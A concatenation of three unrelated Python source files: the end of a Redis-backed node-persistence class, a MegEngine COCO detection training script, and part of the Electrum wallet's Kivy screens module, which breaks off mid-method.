            ret = self._handle.evalsha(self._delete_lua_sha, 2, node_path, node_name)
            if ret == -1:
                raise exception.EPNoNodeError("delete node[%s] error:%s" % (path, "Node has child"))
        if force:
            _deletenode()
        else:
            self._run_catch(_deletenode)

    def create_node(self, path, value="", ephemeral=False, sequence=False, makepath=False):
        """
        Create a node via the atomic lua script.

        :param str path: node path
        :param str value: initial data
        :param bool ephemeral: create an ephemeral (expiring) node
        :param bool sequence: append an auto-allocated sequence number
        :param bool makepath: create missing parent nodes
        :return: the created node's path
        :raises: exception.EPNoNodeError if a parent node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        def _createnode(np=path):
            node_path, node_name = self._split_node_name(np)
            errmsg = {-1: "Node has ttl or parents-node not exists",
                      -2: "Node exists(in parents-node record)",
                      -3: "Node exists"}
            if not self.exists(node_path) and node_path != "/":
                if makepath:
                    self.create_node(node_path, makepath=True)
                else:
                    raise exception.EPNoNodeError(node_path + " not exists")
            seq = 1 if sequence else 0
            tm = long(time.time()) + self._timeout if ephemeral else 0
            ret = self._handle.evalsha(self._new_lua_sha, 2, node_path, node_name, value, seq, tm)
            if ret < 0:
                raise exception.EPIOError("redis error when create[%s:%s]:%s" % (node_path, node_name, errmsg[ret]))
            if ephemeral:
                self._new_touch(ret)
            return ret
        ret = self._run_catch(_createnode)
        log.d("create node success, path:{path}, value:{value}, ephemeral:"
              "{ephemeral}, sequence:{sequence}, makepath:{makepath}".format(
                  path=ret, value=value,
                  ephemeral=ephemeral, sequence=sequence,
                  makepath=makepath))
        return ret

    def exists(self, path):
        """
        Return whether a node exists at ``path`` -- both the parent's record
        of the child and the child's own key must be present.

        :param str path: node path
        :return: True or False
        :rtype: bool
        """
        def _existnode():
            node_path, node_name = self._split_node_name(path)
            ret = self._handle.hexists(node_path, node_name)
            if ret != 1:
                return False
            ret = self._handle.exists(path)
            if ret != 1:
                return False
            else:
                return True
        return self._run_catch(_existnode)

    def add_listener(self, watcher):
        """
        Session-state listeners are not supported by this backend: no-op.

        :return: None
        """
        log.i("nothing to do in RedisPersistence.add_listener()")

    def disconnect(self):
        """
        Stop polling (base class) and close the redis connection.

        :return: None
        """
        super(RedisPersistence, self).disconnect()
        self._handle.close()
|
train.py | # -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import argparse
import bisect
import functools
import importlib
import multiprocessing as mp
import os
import sys
from collections import defaultdict
import megengine as mge
import numpy as np
from megengine import distributed as dist
from megengine import jit
from megengine import optimizer as optim
from megengine.data import Collator, DataLoader, Infinite, RandomSampler
from megengine.data import transform as T
from megengine.data.dataset import COCO
from tabulate import tabulate
logger = mge.get_logger(__name__)
class AverageMeter:
    """Computes and stores running sums of one or more scalar series."""

    def __init__(self, record_len=1):
        # Number of parallel values accumulated per update() call.
        self.record_len = record_len
        self.sum = [0] * record_len
        self.cnt = 0

    def reset(self):
        """Clear all accumulated sums and the update counter."""
        self.sum = [0] * self.record_len
        self.cnt = 0

    def update(self, val):
        """Accumulate one batch of values (iterable of length record_len)."""
        self.sum = [acc + v for acc, v in zip(self.sum, val)]
        self.cnt += 1

    def average(self):
        """Return the per-series mean over all updates since the last reset."""
        return [acc / self.cnt for acc in self.sum]
def worker(rank, world_size, args):
    """Per-process training entry point.

    Initialises distributed training when world_size > 1, builds the
    network from the user-supplied description file, then runs the epoch
    loop; rank 0 additionally logs config and checkpoints every epoch.
    """
    if world_size > 1:
        # One process per GPU; rank doubles as the device index.
        dist.init_process_group(
            master_ip="localhost",
            master_port=23456,
            world_size=world_size,
            rank=rank,
            dev=rank,
        )
        logger.info("Init process group for gpu%d done", rank)
    # Import the net description file (e.g. net.py) as a module.
    sys.path.insert(0, os.path.dirname(args.file))
    current_network = importlib.import_module(os.path.basename(args.file).split(".")[0])
    model = current_network.Net(current_network.Cfg(), batch_size=args.batch_size)
    params = model.parameters(requires_grad=True)
    model.train()
    if rank == 0:
        logger.info(get_config_info(model.cfg))
    # Linear scaling rule: base lr grows with the total batch size.
    opt = optim.SGD(
        params,
        lr=model.cfg.basic_lr * world_size * model.batch_size,
        momentum=model.cfg.momentum,
        weight_decay=model.cfg.weight_decay,
    )
    if args.weight_file is not None:
        # Load pre-trained weights into the backbone only.
        weights = mge.load(args.weight_file)
        model.backbone.bottom_up.load_state_dict(weights)
    logger.info("Prepare dataset")
    loader = build_dataloader(model.batch_size, args.dataset_dir, model.cfg)
    train_loader = iter(loader["train"])
    for epoch_id in range(model.cfg.max_epoch):
        # Step decay: multiply lr by lr_decay_rate at each decay epoch.
        for param_group in opt.param_groups:
            param_group["lr"] = (
                model.cfg.basic_lr
                * world_size
                * model.batch_size
                * (
                    model.cfg.lr_decay_rate
                    ** bisect.bisect_right(model.cfg.lr_decay_sates, epoch_id)
                )
            )
        tot_steps = model.cfg.nr_images_epoch // (model.batch_size * world_size)
        train_one_epoch(model, train_loader, opt, tot_steps, rank, epoch_id, world_size)
        if rank == 0:
            # Checkpoint model state after every epoch.
            save_path = "log-of-{}/epoch_{}.pkl".format(
                os.path.basename(args.file).split(".")[0], epoch_id
            )
            mge.save(
                {"epoch": epoch_id, "state_dict": model.state_dict()}, save_path,
            )
            logger.info("dump weights to %s", save_path)
def adjust_learning_rate(optimizer, epoch_id, step, model, world_size):
    """Apply linear learning-rate warm-up during the first epoch.

    For the first ``model.cfg.warm_iters`` steps of epoch 0 the lr ramps
    linearly up to the (decayed, batch-scaled) base rate; afterwards this
    function leaves the optimizer untouched.
    """
    cfg = model.cfg
    decay = cfg.lr_decay_rate ** bisect.bisect_right(cfg.lr_decay_sates, epoch_id)
    base_lr = cfg.basic_lr * world_size * model.batch_size * decay
    # Warm up: scale the base rate by (step+1)/warm_iters.
    if epoch_id == 0 and step < cfg.warm_iters:
        warm_factor = (step + 1.0) / cfg.warm_iters
        for group in optimizer.param_groups:
            group["lr"] = base_lr * warm_factor
def train_one_epoch(model, data_queue, opt, tot_steps, rank, epoch_id, world_size):
    """Run one epoch of training steps, logging averaged losses on rank 0."""
    @jit.trace(symbolic=True, opt_level=2)
    def propagate():
        # Forward + backward inside a single traced function.
        loss_list = model(model.inputs)
        opt.backward(loss_list[0])
        return loss_list

    # Three tracked loss terms; indices 1 and 2 are logged as cls/loc below.
    meter = AverageMeter(record_len=3)
    log_interval = model.cfg.log_interval
    for step in range(tot_steps):
        adjust_learning_rate(opt, epoch_id, step, model, world_size)
        mini_batch = next(data_queue)
        # Feed the model's pre-declared input tensors in place.
        model.inputs["image"].set_value(mini_batch["data"])
        model.inputs["gt_boxes"].set_value(mini_batch["gt_boxes"])
        model.inputs["im_info"].set_value(mini_batch["im_info"])
        opt.zero_grad()
        loss_list = propagate()
        opt.step()
        if rank == 0:
            meter.update([loss.numpy() for loss in loss_list])
            if step % log_interval == 0:
                average_loss = meter.average()
                logger.info(
                    "e%d, %d/%d, lr:%f, cls:%f, loc:%f",
                    epoch_id,
                    step,
                    tot_steps,
                    opt.param_groups[0]["lr"],
                    average_loss[1],
                    average_loss[2],
                )
                meter.reset()
def make_parser():
    """Build the command-line argument parser for the training entry point."""
    parser = argparse.ArgumentParser()
    option_specs = [
        (("-f", "--file"), dict(default="net.py", type=str, help="net description file")),
        (("-w", "--weight_file"), dict(default=None, type=str, help="pre-train weights file")),
        (("-n", "--ngpus"), dict(default=-1, type=int, help="total number of gpus for training")),
        (("-b", "--batch_size"), dict(default=2, type=int, help="batchsize for training")),
        (("-d", "--dataset_dir"), dict(default="/data/datasets/coco", type=str)),
    ]
    for flags, kwargs in option_specs:
        parser.add_argument(*flags, **kwargs)
    return parser
def get_config_info(config):
    """Render a config object's attributes as a two-column text table.

    Scalar-ish values are shown as-is; other values are shown by name:
    functools.partial objects by their wrapped function's name, callables
    by ``__name__``, and anything else by its class.
    """
    config_table = []
    for c, v in config.__dict__.items():
        if not isinstance(v, (int, float, str, list, tuple, dict, np.ndarray)):
            # Bug fix: check partial FIRST. Every object has __class__, so
            # the original `elif isinstance(v, functools.partial)` branch,
            # placed after the __class__ fallback, was unreachable.
            if isinstance(v, functools.partial):
                v = v.func.__name__
            elif hasattr(v, "__name__"):
                v = v.__name__
            elif hasattr(v, "__class__"):
                v = v.__class__
        config_table.append((str(c), str(v)))
    config_table = tabulate(config_table)
    return config_table
def main():
    """Parse arguments, decide the GPU count, and launch worker processes."""
    parser = make_parser()
    args = parser.parse_args()
    # ------------------------ begin training -------------------------- #
    valid_nr_dev = mge.get_device_count("gpu")
    if args.ngpus == -1:
        # Default: use every visible GPU.
        world_size = valid_nr_dev
    else:
        if args.ngpus > valid_nr_dev:
            logger.error("do not have enough gpus for training")
            sys.exit(1)
        else:
            world_size = args.ngpus
    logger.info("Device Count = %d", world_size)
    # Per-net log directory, e.g. "log-of-net" for net.py.
    log_dir = "log-of-{}".format(os.path.basename(args.file).split(".")[0])
    if not os.path.isdir(log_dir):
        os.makedirs(log_dir)
    if world_size > 1:
        # Spawn one training process per GPU and wait for all of them.
        mp.set_start_method("spawn")
        processes = list()
        for i in range(world_size):
            process = mp.Process(target=worker, args=(i, world_size, args))
            process.start()
            processes.append(process)
        for p in processes:
            p.join()
    else:
        worker(0, 1, args)
def build_dataloader(batch_size, data_dir, cfg):
    """Create the COCO training DataLoader (infinite, shuffled, padded)."""
    train_dataset = COCO(
        os.path.join(data_dir, "train2017"),
        os.path.join(data_dir, "annotations/instances_train2017.json"),
        remove_images_without_annotations=True,
        order=["image", "boxes", "boxes_category", "info"],
    )
    # Infinite sampler: epoch boundaries are enforced by the step count
    # in the training loop, not by the loader.
    train_sampler = Infinite(RandomSampler(train_dataset, batch_size, drop_last=True))
    train_dataloader = DataLoader(
        train_dataset,
        sampler=train_sampler,
        transform=T.Compose(
            transforms=[
                T.ShortestEdgeResize(
                    cfg.train_image_short_size, cfg.train_image_max_size
                ),
                T.RandomHorizontalFlip(),
                T.ToMode(),
            ],
            order=["image", "boxes", "boxes_category"],
        ),
        # Pads variable-sized images/boxes to a uniform batch shape.
        collator=DetectionPadCollator(),
        num_workers=2,
    )
    return {"train": train_dataloader}
class DetectionPadCollator(Collator):
    """Collator that pads a detection minibatch to a common shape."""

    def __init__(self, pad_value: float = 0.0):
        super().__init__()
        # Constant used to fill the padded regions of every array.
        self.pad_value = pad_value

    def apply(self, inputs):
        """
        assume order = ["image", "boxes", "boxes_category", "info"]
        """
        batch_data = defaultdict(list)
        for image, boxes, boxes_category, info in inputs:
            batch_data["data"].append(image)
            # Append the category id as an extra column next to each box.
            batch_data["gt_boxes"].append(
                np.concatenate(
                    [boxes, boxes_category[:, np.newaxis]], axis=1
                ).astype(np.float32)
            )
            _, cur_height, cur_width = image.shape
            assert len(boxes) == len(boxes_category)
            # im_info rows: padded h/w, original h/w, instance count.
            row = [cur_height, cur_width, info[0], info[1], len(boxes)]
            batch_data["im_info"].append(np.array(row, dtype=np.float32))
        for key, items in batch_data.items():
            # Target shape = per-axis maximum across the batch.
            target_shape = [max(dims) for dims in zip(*(x.shape for x in items))]
            padded = [
                np.pad(
                    x,
                    self._get_padding(x.shape, target_shape),
                    constant_values=self.pad_value,
                )
                for x in items
            ]
            batch_data[key] = np.ascontiguousarray(padded)
        return batch_data

    def _get_padding(self, original_shape, target_shape):
        """Per-axis (before, after) pad widths growing each axis to target."""
        assert len(original_shape) == len(target_shape)
        return tuple((0, t - o) for o, t in zip(original_shape, target_shape))
# Script entry point: launch training.
if __name__ == "__main__":
    main()
|
screens.py | import asyncio
from weakref import ref
from decimal import Decimal
import re
import threading
import traceback, sys
from typing import TYPE_CHECKING, List, Optional
from kivy.app import App
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.compat import string_types
from kivy.properties import (ObjectProperty, DictProperty, NumericProperty,
ListProperty, StringProperty)
from kivy.uix.recycleview import RecycleView
from kivy.uix.label import Label
from kivy.uix.behaviors import ToggleButtonBehavior
from kivy.uix.image import Image
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.utils import platform
from kivy.logger import Logger
from electrum.util import profiler, parse_URI, format_time, InvalidPassword, NotEnoughFunds, Fiat
from electrum.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum import bitcoin, constants
from electrum.transaction import Transaction, tx_from_any, PartialTransaction, PartialTxOutput
from electrum.util import (parse_URI, InvalidBitcoinURI, PR_PAID, PR_UNKNOWN, PR_EXPIRED,
PR_INFLIGHT, TxMinedInfo, get_request_status, pr_expiration_values,
maybe_extract_bolt11_invoice)
from electrum.plugin import run_hook
from electrum.wallet import InternalAddressCorruption
from electrum import simple_config
from electrum.lnaddr import lndecode
from electrum.lnutil import RECEIVED, SENT, PaymentFailure
from .dialogs.question import Question
from .dialogs.lightning_open_channel import LightningOpenChannelDialog
from electrum.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum.gui.kivy.main_window import ElectrumWindow
from electrum.paymentrequest import PaymentRequest
class HistoryRecycleView(RecycleView):
    # RecycleView specialisation for the history tab; layout lives in kv.
    pass
class RequestRecycleView(RecycleView):
    # RecycleView specialisation for the receive-requests tab; layout lives in kv.
    pass
class PaymentRecycleView(RecycleView):
    # RecycleView specialisation for the send/payments tab; layout lives in kv.
    pass
class CScreen(Factory.Screen):
    """Base class for the main tabs: a Screen whose UI is loaded lazily
    from the .kv file named by ``kvname`` on first activation."""
    __events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
    action_view = ObjectProperty(None)
    loaded = False  # becomes True once load_screen() has run
    kvname = None  # kv file basename; also the app attribute suffix
    app = App.get_running_app()  # type: ElectrumWindow

    def _change_action_view(self):
        # Swap this screen's action view into the shared action bar.
        app = App.get_running_app()
        action_bar = app.root.manager.current_screen.ids.action_bar
        _action_view = self.action_view
        if (not _action_view) or _action_view.parent:
            return
        action_bar.clear_widgets()
        action_bar.add_widget(_action_view)

    def on_enter(self):
        # FIXME: use a proper event don't use animation time of screen
        Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
        pass

    def update(self):
        # Overridden by subclasses to refresh their widgets.
        pass

    @profiler
    def load_screen(self):
        # Load the kv layout and register this screen on the app object
        # (e.g. app.send_screen for kvname == 'send').
        self.screen = Builder.load_file('electrum/gui/kivy/uix/ui_screens/' + self.kvname + '.kv')
        self.add_widget(self.screen)
        self.loaded = True
        self.update()
        setattr(self.app, self.kvname + '_screen', self)

    def on_activate(self):
        if self.kvname and not self.loaded:
            self.load_screen()
        #Clock.schedule_once(lambda dt: self._change_action_view())

    def on_leave(self):
        self.dispatch('on_deactivate')

    def on_deactivate(self):
        pass
# note: this list needs to be kept in sync with another in qt
# Icon basename per tx status code (index) returned by get_tx_status().
TX_ICONS = [
    "unconfirmed",
    "close",
    "unconfirmed",
    "close",
    "clock1",
    "clock2",
    "clock3",
    "clock4",
    "clock5",
    "confirmed",
]
class HistoryScreen(CScreen):
    """The 'history' tab: lists on-chain and lightning transactions."""
    tab = ObjectProperty(None)
    kvname = 'history'
    cards = {}

    def __init__(self, **kwargs):
        self.ra_dialog = None
        super(HistoryScreen, self).__init__(**kwargs)

    def show_item(self, obj):
        # Open the appropriate detail dialog for a tapped history entry.
        key = obj.key
        tx_item = self.history.get(key)
        if tx_item.get('lightning') and tx_item['type'] == 'payment':
            self.app.lightning_tx_dialog(tx_item)
            return
        if tx_item.get('lightning'):
            # Lightning-related on-chain txs are tracked by the lnwatcher db.
            tx = self.app.wallet.lnworker.lnwatcher.db.get_transaction(key)
        else:
            tx = self.app.wallet.db.get_transaction(key)
        if not tx:
            return
        self.app.tx_dialog(tx)

    def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
        """Build the dict consumed by the history RecycleView entry."""
        is_lightning = tx_item.get('lightning', False)
        timestamp = tx_item['timestamp']
        key = tx_item.get('txid') or tx_item['payment_hash']
        if is_lightning:
            status = 0
            status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
            icon = "atlas://electrum/gui/kivy/theming/light/lightning"
            message = tx_item['label']
            fee_msat = tx_item['fee_msat']
            fee = int(fee_msat/1000) if fee_msat else None
            fee_text = '' if fee is None else 'fee: %d sat'%fee
        else:
            tx_hash = tx_item['txid']
            conf = tx_item['confirmations']
            tx_mined_info = TxMinedInfo(height=tx_item['height'],
                                        conf=tx_item['confirmations'],
                                        timestamp=tx_item['timestamp'])
            status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
            # Status code indexes the module-level TX_ICONS list.
            icon = "atlas://electrum/gui/kivy/theming/light/" + TX_ICONS[status]
            message = tx_item['label'] or tx_hash
            fee = tx_item['fee_sat']
            fee_text = '' if fee is None else 'fee: %d sat'%fee
        ri = {}
        ri['screen'] = self
        ri['key'] = key
        ri['icon'] = icon
        ri['date'] = status_str
        ri['message'] = message
        ri['fee_text'] = fee_text
        value = tx_item['value'].value
        if value is not None:
            # Outgoing amounts are negative or zero.
            ri['is_mine'] = value <= 0
            ri['amount'] = self.app.format_amount(value, is_diff = True)
            if 'fiat_value' in tx_item:
                ri['quote_text'] = str(tx_item['fiat_value'])
        return ri

    def update(self, see_all=False):
        wallet = self.app.wallet
        if wallet is None:
            return
        self.history = wallet.get_full_history(self.app.fx)
        # Most recent entries first.
        history = reversed(self.history.values())
        history_card = self.screen.ids.history_container
        history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen):
    """The 'send' tab: parse payment URIs/invoices, save and pay them."""
    kvname = 'send'
    payment_request = None  # type: Optional[PaymentRequest]
    payment_request_queued = None  # type: Optional[str]
    parsed_URI = None

    def set_URI(self, text: str):
        # Fill the form from a BIP21 URI; queue it if the wallet isn't loaded yet.
        if not self.app.wallet:
            self.payment_request_queued = text
            return
        try:
            uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
        except InvalidBitcoinURI as e:
            self.app.show_info(_("Error parsing URI") + f":\n{e}")
            return
        self.parsed_URI = uri
        amount = uri.get('amount')
        self.screen.address = uri.get('address', '')
        self.screen.message = uri.get('message', '')
        self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
        self.payment_request = None
        self.screen.is_lightning = False

    def set_ln_invoice(self, invoice):
        # Fill the form from a BOLT11 lightning invoice.
        try:
            invoice = str(invoice).lower()
            lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
        except Exception as e:
            self.app.show_info(invoice + _(" is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
            return
        self.screen.address = invoice
        self.screen.message = dict(lnaddr.tags).get('d', None)
        self.screen.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
        self.payment_request = None
        self.screen.is_lightning = True

    def update(self):
        """Refresh the list of saved invoices shown on this tab."""
        if not self.loaded:
            return
        # Process any URI that arrived before the wallet was ready.
        if self.app.wallet and self.payment_request_queued:
            self.set_URI(self.payment_request_queued)
            self.payment_request_queued = None
        _list = self.app.wallet.get_invoices()
        lnworker_logs = self.app.wallet.lnworker.logs if self.app.wallet.lnworker else {}
        # NOTE(review): `and` binds tighter than `or` here, so paid invoices
        # are still listed when the lnworker has logs for them -- confirm intended.
        _list = [x for x in _list if x and x.get('status') != PR_PAID or x.get('rhash') in lnworker_logs]
        payments_container = self.screen.ids.payments_container
        payments_container.data = [self.get_card(item) for item in _list]

    def show_item(self, obj):
        self.app.show_invoice(obj.is_lightning, obj.key)

    def get_card(self, item):
        """Build the dict consumed by the payments RecycleView entry."""
        invoice_type = item['type']
        status, status_str = get_request_status(item) # convert to str
        if invoice_type == PR_TYPE_LN:
            key = item['rhash']
            log = self.app.wallet.lnworker.logs.get(key)
            if item['status'] == PR_INFLIGHT and log:
                # Show the number of payment attempts so far.
                status_str += '... (%d)'%len(log)
        elif invoice_type == PR_TYPE_ONCHAIN:
            key = item['id']
        else:
            raise Exception('unknown invoice type')
        return {
            'is_lightning': invoice_type == PR_TYPE_LN,
            'is_bip70': 'bip70' in item,
            'screen': self,
            'status': status,
            'status_str': status_str,
            'key': key,
            'memo': item['message'],
            'amount': self.app.format_amount_and_units(item['amount'] or 0),
        }

    def do_clear(self):
        # Reset the form to its empty state.
        self.screen.amount = ''
        self.screen.message = ''
        self.screen.address = ''
        self.payment_request = None
        self.screen.is_lightning = False
        self.screen.is_bip70 = False
        self.parsed_URI = None

    def set_request(self, pr: 'PaymentRequest'):
        # Fill (and lock) the form from a BIP70 payment request.
        self.screen.address = pr.get_requestor()
        amount = pr.get_amount()
        self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
        self.screen.message = pr.get_memo()
        self.screen.locked = True
        self.payment_request = pr

    def do_paste(self):
        """Interpret clipboard contents as tx, lightning invoice, or URI."""
        data = self.app._clipboard.paste().strip()
        if not data:
            self.app.show_info(_("Clipboard is empty"))
            return
        # try to decode as transaction
        try:
            tx = tx_from_any(data)
            tx.deserialize()
        except:
            tx = None
        if tx:
            self.app.tx_dialog(tx)
            return
        # try to decode as URI/address
        bolt11_invoice = maybe_extract_bolt11_invoice(data)
        if bolt11_invoice is not None:
            self.set_ln_invoice(bolt11_invoice)
        else:
            self.set_URI(data)

    def read_invoice(self):
        """Validate the form and build an invoice dict; None on error."""
        address = str(self.screen.address)
        if not address:
            self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Bitcoin address or a payment request'))
            return
        if not self.screen.amount:
            self.app.show_error(_('Please enter an amount'))
            return
        try:
            amount = self.app.get_amount(self.screen.amount)
        except:
            self.app.show_error(_('Invalid amount') + ':\n' + self.screen.amount)
            return
        message = self.screen.message
        if self.screen.is_lightning:
            return self.app.wallet.lnworker.parse_bech32_invoice(address)
        else:  # on-chain
            if self.payment_request:
                # BIP70 payment requests carry their own outputs.
                outputs = self.payment_request.get_outputs()
            else:
                if not bitcoin.is_address(address):
                    self.app.show_error(_('Invalid Bitcoin Address') + ':\n' + address)
                    return
                outputs = [PartialTxOutput.from_address_and_value(address, amount)]
            return self.app.wallet.create_invoice(outputs, message, self.payment_request, self.parsed_URI)

    def do_save(self):
        invoice = self.read_invoice()
        if not invoice:
            return
        self.app.wallet.save_invoice(invoice)
        self.do_clear()
        self.update()

    def do_pay(self):
        invoice = self.read_invoice()
        if not invoice:
            return
        # Persist first so a failed payment can be retried from the list.
        self.app.wallet.save_invoice(invoice)
        self.do_clear()
        self.update()
        self.do_pay_invoice(invoice)

    def do_pay_invoice(self, invoice):
        if invoice['type'] == PR_TYPE_LN:
            self._do_pay_lightning(invoice)
            return
        elif invoice['type'] == PR_TYPE_ONCHAIN:
            do_pay = lambda rbf: self._do_pay_onchain(invoice, rbf)
            if self.app.electrum_config.get('use_rbf'):
                # Ask whether the tx should be replaceable (RBF).
                d = Question(_('Should this transaction be replaceable?'), do_pay)
                d.open()
            else:
                do_pay(False)
        else:
            raise Exception('unknown invoice type')

    def _do_pay_lightning(self, invoice):
        attempts = 10
        # Pay in a background thread so the UI stays responsive.
        threading.Thread(target=self.app.wallet.lnworker.pay, args=(invoice['invoice'], invoice['amount'], attempts)).start()

    def _do_pay_onchain(self, invoice, rbf):
        # make unsigned transaction
        outputs = invoice['outputs']  # type: List[PartialTxOutput]
        amount = sum(map(lambda x: x.value, outputs))
        coins = self.app.wallet.get_spendable_coins(None)
        try:
            tx = self.app.wallet.make_unsigned_transaction(coins=coins, outputs=outputs)
        except NotEnoughFunds:
            self.app.show_error(_("Not enough funds"))
            return
        except Exception as e:
            Logger.exception('')
            self.app.show_error(repr(e))
            return
        if rbf:
            tx.set_rbf(True)
        fee = tx.get_fee()
        # Build the confirmation message shown before the PIN prompt.
        msg = [
            _("Amount to be sent") + ": " + self.app.format_amount_and_units(amount),
            _("Mining fee") + ": " + self.app.format_amount_and_units(fee),
        ]
        x_fee = run_hook('get_tx_extra_fee', self.app.wallet, tx)
        if x_fee:
            x_fee_address, x_fee_amount = x_fee
            msg.append(_("Additional fees") + ": " + self.app.format_amount_and_units(x_fee_amount))
        feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
        if fee > feerate_warning * tx.estimated_size() / 1000:
            msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
        msg.append(_("Enter your PIN code to proceed"))
        self.app.protected('\n'.join(msg), self.send_tx, (tx,))

    def send_tx(self, tx, password):
        # Called back by app.protected() with the user's password/PIN.
        if self.app.wallet.has_password() and password is None:
            return
        def on_success(tx):
            if tx.is_complete():
                self.app.broadcast(tx)
            else:
                self.app.tx_dialog(tx)
        def on_failure(error):
            self.app.show_error(error)
        if self.app.wallet.can_sign(tx):
            self.app.show_info("Signing...")
            self.app.sign_tx(tx, password, on_success, on_failure)
        else:
            self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
    """The 'receive' tab: create and track payment requests."""
    kvname = 'receive'

    def __init__(self, **kwargs):
        super(ReceiveScreen, self).__init__(**kwargs)
        # Periodic refresh so request statuses/expiries stay current.
        Clock.schedule_interval(lambda dt: self.update(), 5)

    def expiry(self):
        # Configured request lifetime in seconds.
        return self.app.electrum_config.get('request_expiry', 3600) # 1 hour

    def clear(self):
        self.screen.address = ''
        self.screen.amount = ''
        self.screen.message = ''
        self.screen.lnaddr = ''

    def set_address(self, addr):
        self.screen.address = addr

    def on_address(self, addr):
        # Populate the form from an existing request for this address.
        req = self.app.wallet.get_request(addr)
        self.screen.status = ''
        if req:
            self.screen.message = req.get('memo', '')
            amount = req.get('amount')
            self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
            status = req.get('status', PR_UNKNOWN)
            self.screen.status = _('Payment received') if status == PR_PAID else ''

    def get_URI(self):
        """Return the BIP21 URI for the current form contents."""
        from electrum.util import create_bip21_uri
        amount = self.screen.amount
        if amount:
            # Displayed amount is "<value> <unit>"; convert back to satoshis.
            a, u = self.screen.amount.split()
            assert u == self.app.base_unit
            amount = Decimal(a) * pow(10, self.app.decimal_point())
        return create_bip21_uri(self.screen.address, amount, self.screen.message)

    def do_copy(self):
        uri = self.get_URI()
        self.app._clipboard.copy(uri)
        self.app.show_info(_('Request copied to clipboard'))

    def new_request(self, lightning):
        """Create a lightning or on-chain request and show its dialog."""
        amount = self.screen.amount
        amount = self.app.get_amount(amount) if amount else 0
        message = self.screen.message
        if lightning:
            key = self.app.wallet.lnworker.add_request(amount, message, self.expiry())
        else:
            addr = self.screen.address or self.app.wallet.get_unused_address()
            if not addr:
                self.app.show_info(_('No address available. Please remove some of your pending requests.'))
                return
            self.screen.address = addr
            req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
            self.app.wallet.add_payment_request(req)
            key = addr
        self.clear()
        self.update()
        self.app.show_request(lightning, key)

    def get_card(self, req):
        """Build the dict consumed by the requests RecycleView entry."""
        is_lightning = req.get('type') == PR_TYPE_LN
        if not is_lightning:
            address = req['address']
            key = address
        else:
            key = req['rhash']
            address = req['invoice']
        amount = req.get('amount')
        description = req.get('memo', '')
        status, status_str = get_request_status(req)
        ci = {}
        ci['screen'] = self
        ci['address'] = address
        ci['is_lightning'] = is_lightning
        ci['key'] = key
        ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
        ci['memo'] = description
        ci['status'] = status_str
        ci['is_expired'] = status == PR_EXPIRED
        return ci

    def update(self):
        if not self.loaded:
            return
        # Paid requests are hidden from the list.
        _list = self.app.wallet.get_sorted_requests()
        requests_container = self.screen.ids.requests_container
        requests_container.data = [self.get_card(item) for item in _list if item.get('status') != PR_PAID]

    def show_item(self, obj):
        self.app.show_request(obj.is_lightning, obj.key)

    def expiration_dialog(self, obj):
        # Let the user pick the default expiry for new requests.
        from .dialogs.choice_dialog import ChoiceDialog
        def callback(c):
            self.app.electrum_config.set_key('request_expiry', c)
        d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
        d.open()

    def clear_requests_dialog(self):
        # Offer to delete all expired requests at once.
        requests = self.app.wallet.get_sorted_requests()
        expired = [req for req in requests if get_request_status(req)[0] == PR_EXPIRED]
        if len(expired) == 0:
            return
        def callback(c):
            if c:
                for req in expired:
                    key = req.get('rhash') or req['address']
                    self.app.wallet.delete_request(key)
                self.update()
        d = Question(_('Delete expired requests?'), callback)
        d.open()
class TabbedCarousel(Factory.TabbedPanel):
    '''Custom TabbedPanel using a carousel used in the Main Screen
    '''
    carousel = ObjectProperty(None)

    def animate_tab_to_center(self, value):
        # Scroll the tab strip so the selected tab header ends up centred.
        scrlv = self._tab_strip.parent
        if not scrlv:
            return
        idx = self.tab_list.index(value)
        n = len(self.tab_list)
        if idx in [0, 1]:
            scroll_x = 1
        elif idx in [n-1, n-2]:
            scroll_x = 0
        else:
            scroll_x = 1. * (n - idx - 1) / (n - 1)
        mation = Factory.Animation(scroll_x=scroll_x, d=.25)
        mation.cancel_all(scrlv)
        mation.start(scrlv)

    def on_current_tab(self, instance, value):
        self.animate_tab_to_center(value)

    def on_index(self, instance, value):
        # Carousel was swiped: sync the tab header with the new slide.
        current_slide = instance.current_slide
        if not hasattr(current_slide, 'tab'):
            return
        tab = current_slide.tab
        ct = self.current_tab
        try:
            if ct.text != tab.text:
                carousel = self.carousel
                carousel.slides[ct.slide].dispatch('on_leave')
                self.switch_to(tab)
                carousel.slides[tab.slide].dispatch('on_enter')
        except AttributeError:
            current_slide.dispatch('on_enter')

    def switch_to(self, header):
        # we have to replace the functionality of the original switch_to
        if not header:
            return
        if not hasattr(header, 'slide'):
            # Plain header (no linked slide): attach the carousel as content.
            header.content = self.carousel
            super(TabbedCarousel, self).switch_to(header)
            try:
                tab = self.tab_list[-1]
            except IndexError:
                return
            self._current_tab = tab
            tab.state = 'down'
            return
        carousel = self.carousel
